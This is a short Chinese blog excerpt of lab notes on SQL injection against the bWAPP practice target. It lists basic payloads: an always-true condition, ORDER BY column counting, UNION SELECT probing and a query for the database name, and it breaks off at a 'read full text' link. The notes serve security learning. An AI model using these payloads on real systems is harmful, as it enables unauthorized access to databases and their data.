2022年6月15日
sql注入1----sql injection get search
摘要: 使用靶机为bwapp 查询所有的结果 1111' or 1=1 # 查询所有的数据内容行 ' order by 7 # 查看列数 1' UNION SELECT 1,2,3,4,5,6 # 查看所在的数据库,得到库名 1' union select 1,database(),3,4,5,6 # 查看 阅读全文
posted @ 2022-06-15 14:52 沫笙* 阅读(59) 评论(0) 推荐(0) 编辑